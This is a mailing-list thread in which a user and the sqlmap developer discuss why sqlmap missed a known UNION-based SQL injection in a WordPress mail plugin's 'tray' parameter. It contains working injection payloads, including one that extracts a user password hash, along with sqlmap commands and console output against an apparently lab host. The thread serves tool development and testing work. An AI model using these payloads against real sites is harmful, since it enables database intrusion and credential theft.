Aha, I got it:
bperry@ubuntu:~/tools/sqlmap$ ./sqlmap.py -r /tmp/req.req -o --dbms=mysql
-p tray --flush-session -t /tmp/traffic.txt --proxy=http://127.0.0.1:8080
--technique=u --suffix=" LIMIT 1,1#" --prefix='in_deleted ' --level=5
--risk=3 -o _
___ ___| |_____ ___ ___ {1.0-dev-180ede0}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior
mutual consent is illegal. It is the end user's responsibility to obey all
applicable local, state and federal laws. Developers assume no liability
and are not responsible for any misuse or damage caused by this program
[*] starting at 09:54:50
[09:54:50] [INFO] parsing HTTP request from '/tmp/req.req'
[09:54:50] [INFO] setting file for logging HTTP traffic
[09:54:50] [WARNING] persistent HTTP(s) connections, Keep-Alive, has been
disabled because of its incompatibility with HTTP(s) proxy
[09:54:50] [INFO] testing connection to the target URL
[09:54:50] [INFO] heuristics detected web page charset 'ascii'
[09:54:50] [WARNING] heuristic (basic) test shows that POST parameter
'tray' might not be injectable
[09:54:50] [INFO] testing for SQL injection on POST parameter 'tray'
[09:54:50] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[09:54:51] [WARNING] reflective value(s) found and filtering out
[09:54:51] [INFO] testing 'MySQL UNION query (random number) - 1 to 10
columns'
[09:54:51] [INFO] target URL appears to be UNION injectable with 1 columns
[09:54:51] [INFO] POST parameter 'tray' is 'MySQL UNION query (random
number) - 1 to 10 columns' injectable
POST parameter 'tray' is vulnerable. Do you want to keep testing the others
(if any)? [y/N] n
sqlmap identified the following injection points with a total of 26 HTTP(s)
requests:
---
Parameter: tray (POST)
Type: UNION query
Title: MySQL UNION query (random number) - 1 column
Payload: action=getMailMessage&tray=in_deleted UNION ALL SELECT
CONCAT(0x71786b7171,0x756a6c48694a6a504545,0x71767a6a71) LIMIT 1,1#&mid=1
---
[09:55:02] [INFO] testing MySQL
[09:55:02] [INFO] confirming MySQL
[09:55:03] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.0.0
[09:55:03] [INFO] fetched data logged to text files under
'/home/bperry/.sqlmap/output/172.31.16.26'
[*] shutting down at 09:55:03
bperry@ubuntu:~/tools/sqlmap$
On Mon, Dec 15, 2014 at 11:46 AM, Brandon Perry <bperry.volat...@gmail.com>
wrote:
>
> Sorry, one more thing to note, the following command gets very close to
> exploiting the injection:
>
> ./sqlmap.py -r /tmp/req.req -o --dbms=mysql -p tray --flush-session -t
> /tmp/traffic.txt --proxy=http://127.0.0.1:8080 --technique=u --suffix="
> LIMIT 1,1#" --union-char=f --prefix='in_deleted '
>
> The only problem is that the union-char is 'f', when I was hoping it would
> be 0x66. When I capture the request and replace 'f' with 0x66, the
> injection works. Looks like ' is a bad char.
>
> On Mon, Dec 15, 2014 at 11:29 AM, Brandon Perry <bperry.volat...@gmail.com
> > wrote:
>>
>> Playing with the queries sqlmap sends a bit more:
>>
>> action=getMailMessage&tray=in_deleted UNION ALL SELECT NULL#&mid=1
>>
>> This results in a 0 being returned where the password hash was in the
>> successful injection:
>>
>> 1[split]0[split]in_deleted UNION ALL SELECT NULL#[split]
>> ^ injection result
>>
>>
>> action=getMailMessage&tray=in_deleted UNION ALL SELECT 0x66647361#&mid=1
>>
>> This payload also results in a 0 being returned, not 'fdsa' as you would
>> expect.
>>
>> However, this payload does return 'fdsa'
>>
>> action=getMailMessage&tray=in_deleted UNION ALL SELECT 0x66647361 LIMIT
>> 1,1#&mid=1
>>
>> 1[split]fdsa[split]in_deleted UNION ALL SELECT 0x66647361 LIMIT
>> 1,1#[split]
>>
>>
>> Hope this helps.
>>
>>
>> On Mon, Dec 15, 2014 at 11:01 AM, Brandon Perry <
>> bperry.volat...@gmail.com> wrote:
>>>
>>> Here is the console output. Attached is the traffic log in a zip:
>>>
>>> bperry@ubuntu:~/tools/sqlmap$ ./sqlmap.py -r /tmp/req.req --level=5
>>> --risk=3 -o --dbms=mysql -p tray --flush-session -t /tmp/traffic.txt
>>> _
>>> ___ ___| |_____ ___ ___ {1.0-dev-180ede0}
>>> |_ -| . | | | .'| . |
>>> |___|_ |_|_|_|_|__,| _|
>>> |_| |_| http://sqlmap.org
>>>
>>> [!] legal disclaimer: Usage of sqlmap for attacking targets without
>>> prior mutual consent is illegal. It is the end user's responsibility to
>>> obey all applicable local, state and federal laws. Developers assume no
>>> liability and are not responsible for any misuse or damage caused by this
>>> program
>>>
>>> [*] starting at 08:56:27
>>>
>>> [08:56:27] [INFO] parsing HTTP request from '/tmp/req.req'
>>> [08:56:27] [INFO] setting file for logging HTTP traffic
>>> [08:56:27] [INFO] flushing session file
>>> [08:56:27] [INFO] testing connection to the target URL
>>> [08:56:27] [INFO] heuristics detected web page charset 'ascii'
>>> [08:56:27] [INFO] testing if the target URL is stable. This can take a
>>> couple of seconds
>>> [08:56:28] [INFO] target URL is stable
>>> [08:56:28] [WARNING] heuristic (basic) test shows that POST parameter
>>> 'tray' might not be injectable
>>> [08:56:28] [INFO] testing for SQL injection on POST parameter 'tray'
>>> [08:56:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING
>>> clause'
>>> [08:56:28] [WARNING] reflective value(s) found and filtering out
>>> [08:56:39] [INFO] testing 'AND boolean-based blind - WHERE or HAVING
>>> clause (MySQL comment)'
>>> [08:56:49] [INFO] testing 'AND boolean-based blind - WHERE or HAVING
>>> clause (Generic comment)'
>>> [08:56:59] [INFO] testing 'OR boolean-based blind - WHERE or HAVING
>>> clause'
>>> [08:57:05] [INFO] testing 'OR boolean-based blind - WHERE or HAVING
>>> clause (MySQL comment)'
>>> [08:57:12] [INFO] testing 'OR boolean-based blind - WHERE or HAVING
>>> clause (Generic comment)'
>>> [08:57:18] [INFO] testing 'MySQL boolean-based blind - WHERE, HAVING,
>>> ORDER BY or GROUP BY clause (RLIKE)'
>>> [08:57:28] [INFO] testing 'Generic boolean-based blind - Parameter
>>> replace (original value)'
>>> [08:57:28] [INFO] testing 'MySQL boolean-based blind - Parameter replace
>>> (MAKE_SET - original value)'
>>> [08:57:29] [INFO] testing 'MySQL boolean-based blind - Parameter replace
>>> (ELT - original value)'
>>> [08:57:29] [INFO] testing 'MySQL boolean-based blind - Parameter replace
>>> (bool*int - original value)'
>>> [08:57:29] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter
>>> replace (original value)'
>>> [08:57:29] [INFO] testing 'MySQL < 5.0 boolean-based blind - Parameter
>>> replace (original value)'
>>> [08:57:29] [INFO] testing 'Generic boolean-based blind - GROUP BY and
>>> ORDER BY clauses'
>>> [08:57:30] [INFO] testing 'Generic boolean-based blind - GROUP BY and
>>> ORDER BY clauses (original value)'
>>> [08:57:30] [INFO] testing 'MySQL >= 5.0 boolean-based blind - GROUP BY
>>> and ORDER BY clauses'
>>> [08:57:31] [INFO] testing 'MySQL < 5.0 boolean-based blind - GROUP BY
>>> and ORDER BY clauses'
>>> [08:57:31] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or
>>> HAVING clause'
>>> [08:57:34] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or
>>> HAVING clause (EXTRACTVALUE)'
>>> [08:57:38] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or
>>> HAVING clause (UPDATEXML)'
>>> [08:57:41] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE or
>>> HAVING clause (BIGINT UNSIGNED)'
>>> [08:57:45] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or
>>> HAVING clause'
>>> [08:57:48] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE or HAVING
>>> clause'
>>> [08:57:51] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING
>>> clause (EXTRACTVALUE)'
>>> [08:57:55] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING
>>> clause (UPDATEXML)'
>>> [08:57:58] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING
>>> clause (BIGINT UNSIGNED)'
>>> [08:58:01] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING
>>> clause'
>>> [08:58:04] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
>>> [08:58:08] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
>>> [08:58:08] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace
>>> (EXTRACTVALUE)'
>>> [08:58:08] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace
>>> (UPDATEXML)'
>>> [08:58:08] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace
>>> (BIGINT UNSIGNED)'
>>> [08:58:08] [INFO] testing 'MySQL >= 5.0 error-based - GROUP BY and ORDER
>>> BY clauses'
>>> [08:58:08] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and ORDER
>>> BY clauses (EXTRACTVALUE)'
>>> [08:58:08] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and ORDER
>>> BY clauses (UPDATEXML)'
>>> [08:58:08] [INFO] testing 'MySQL >= 5.5 error-based - GROUP BY and ORDER
>>> BY clauses (BIGINT UNSIGNED)'
>>> [08:58:08] [INFO] testing 'MySQL inline queries'
>>> [08:58:08] [INFO] testing 'MySQL > 5.0.11 stacked queries'
>>> [08:58:12] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
>>> [08:58:15] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
>>> [08:58:18] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (comment)'
>>> [08:58:22] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy
>>> query)'
>>> [08:58:26] [INFO] POST parameter 'tray' seems to be 'MySQL < 5.0.12 AND
>>> time-based blind (heavy query)' injectable
>>> [08:58:26] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
>>> [08:58:26] [INFO] automatically extending ranges for UNION query
>>> injection technique tests as there is at least one other (potential)
>>> technique found
>>> [08:58:28] [INFO] target URL appears to be UNION injectable with 1
>>> columns
>>> [08:58:28] [INFO] testing 'MySQL UNION query (random number) - 1 to 20
>>> columns'
>>> [08:58:29] [INFO] testing 'MySQL UNION query (NULL) - 22 to 40 columns'
>>> [08:58:31] [INFO] testing 'MySQL UNION query (random number) - 22 to 40
>>> columns'
>>> [08:58:32] [INFO] testing 'MySQL UNION query (NULL) - 42 to 60 columns'
>>> [08:58:33] [INFO] testing 'MySQL UNION query (random number) - 42 to 60
>>> columns'
>>> [08:58:35] [INFO] testing 'MySQL UNION query (NULL) - 62 to 80 columns'
>>> [08:58:36] [INFO] testing 'MySQL UNION query (random number) - 62 to 80
>>> columns'
>>> [08:58:38] [INFO] testing 'MySQL UNION query (NULL) - 82 to 100 columns'
>>> [08:58:39] [INFO] testing 'MySQL UNION query (random number) - 82 to 100
>>> columns'
>>> [08:58:40] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
>>> [08:58:42] [INFO] testing 'Generic UNION query (random number) - 1 to 20
>>> columns'
>>> [08:58:44] [INFO] testing 'Generic UNION query (NULL) - 22 to 40 columns'
>>> [08:58:45] [INFO] testing 'Generic UNION query (random number) - 22 to
>>> 40 columns'
>>> [08:58:46] [INFO] testing 'Generic UNION query (NULL) - 42 to 60 columns'
>>> [08:58:48] [INFO] testing 'Generic UNION query (random number) - 42 to
>>> 60 columns'
>>> [08:58:49] [INFO] testing 'Generic UNION query (NULL) - 62 to 80 columns'
>>> [08:58:50] [INFO] testing 'Generic UNION query (random number) - 62 to
>>> 80 columns'
>>> [08:58:52] [INFO] testing 'Generic UNION query (NULL) - 82 to 100
>>> columns'
>>> [08:58:53] [INFO] testing 'Generic UNION query (random number) - 82 to
>>> 100 columns'
>>> [08:58:54] [INFO] checking if the injection point on POST parameter
>>> 'tray' is a false positive
>>> POST parameter 'tray' is vulnerable. Do you want to keep testing the
>>> others (if any)? [y/N] n
>>> sqlmap identified the following injection points with a total of 2049
>>> HTTP(s) requests:
>>> ---
>>> Parameter: tray (POST)
>>> Type: AND/OR time-based blind
>>> Title: MySQL < 5.0.12 AND time-based blind (heavy query)
>>> Payload: action=getMailMessage&tray=in_deleted AND
>>> 9095=BENCHMARK(5000000,MD5(0x6e434246))-- QPnA&mid=1
>>> ---
>>> [08:59:48] [INFO] testing MySQL
>>> [08:59:48] [WARNING] it is very important not to stress the network
>>> adapter during usage of time-based payloads to prevent potential errors
>>> do you want sqlmap to try to optimize value(s) for DBMS delay responses
>>> (option '--time-sec')? [Y/n]
>>> [08:59:51] [INFO] confirming MySQL
>>> [08:59:53] [INFO] adjusting time delay to 1 second due to good response
>>> times
>>> [08:59:53] [INFO] the back-end DBMS is MySQL
>>> web server operating system: Linux Ubuntu
>>> web application technology: Apache 2.4.7, PHP 5.5.9
>>> back-end DBMS: MySQL >= 5.0.0
>>> [08:59:53] [INFO] fetched data logged to text files under
>>> '/home/bperry/.sqlmap/output/172.31.16.26'
>>>
>>> [*] shutting down at 08:59:53
>>>
>>> bperry@ubuntu:~/tools/sqlmap$
>>>
>>> On Mon, Dec 15, 2014 at 10:54 AM, Miroslav Stampar <
>>> miroslav.stam...@gmail.com> wrote:
>>>>
>>>> Hi.
>>>>
>>>> I don't see a reason why this form of UNION test would be any different
>>>> than the regular used by sqlmap. Can you please send me the traffic file
>>>> for such run (... --flush-session -t traffic.txt) along with console
>>>> output?
>>>>
>>>> Bye
>>>> On Dec 15, 2014 5:50 PM, "Brandon Perry" <bperry.volat...@gmail.com>
>>>> wrote:
>>>>
>>>>> Hello!
>>>>>
>>>>> Playing around with the following vulnerabivlity:
>>>>>
>>>>> http://www.exploit-db.com/exploits/35505/
>>>>>
>>>>>
>>>>> Using a payload such as 'action=getMailMessage&tray=in_deleted = 1
>>>>> UNION (SELECT user_pass FROM wp_users WHERE ID=1) LIMIT 1, 1 -- &mid=1'
>>>>> does result in a response from the server with the hash of the first user:
>>>>>
>>>>> 1[split]$P$BbXpOww1mX0g3gf5TxXz53Iu/S5ryu.[split]in_deleted = 1 UNION
>>>>> (SELECT user_pass FROM wp_users WHERE ID=1) LIMIT 1, 1 -- [split]
>>>>>
>>>>>
>>>>> However, sqlmap only finds a time based injection. Looking at sqlmap
>>>>> through burp, I do see sqlmap doesn't try an injection syntax like the one
>>>>> used in the PoC. It may be useful to add a syntax of UNION (SELECT
>>>>> CONCAT(blah, blah, blah) FROM blah).
>>>>>
>>>>> Just a thought!
>>>>>
>>>>>
>>>>> --
>>>>> http://volatile-minds.blogspot.com -- blog
>>>>> http://www.volatileminds.net -- website
>>>>>
>>>>>
>>>>> ------------------------------------------------------------------------------
>>>>> Download BIRT iHub F-Type - The Free Enterprise-Grade BIRT Server
>>>>> from Actuate! Instantly Supercharge Your Business Reports and
>>>>> Dashboards
>>>>> with Interactivity, Sharing, Native Excel Exports, App Integration &
>>>>> more
>>>>> Get technology previously reserved for billion-dollar corporations,
>>>>> FREE
>>>>>
>>>>> http://pubads.g.doubleclick.net/gampad/clk?id=164703151&iu=/4140/ostg.clktrk
>>>>> _______________________________________________
>>>>> sqlmap-users mailing list
>>>>> sqlmap-users@lists.sourceforge.net
>>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>>>
>>>>>
>>>
>>> --
>>> http://volatile-minds.blogspot.com -- blog
>>> http://www.volatileminds.net -- website
>>>
>>
>>
>> --
>> http://volatile-minds.blogspot.com -- blog
>> http://www.volatileminds.net -- website
>>
>
>
> --
> http://volatile-minds.blogspot.com -- blog
> http://www.volatileminds.net -- website
>
--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
------------------------------------------------------------------------------
Download BIRT iHub F-Type - The Free Enterprise-Grade BIRT Server
from Actuate! Instantly Supercharge Your Business Reports and Dashboards
with Interactivity, Sharing, Native Excel Exports, App Integration & more
Get technology previously reserved for billion-dollar corporations, FREE
http://pubads.g.doubleclick.net/gampad/clk?id=164703151&iu=/4140/ostg.clktrk
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
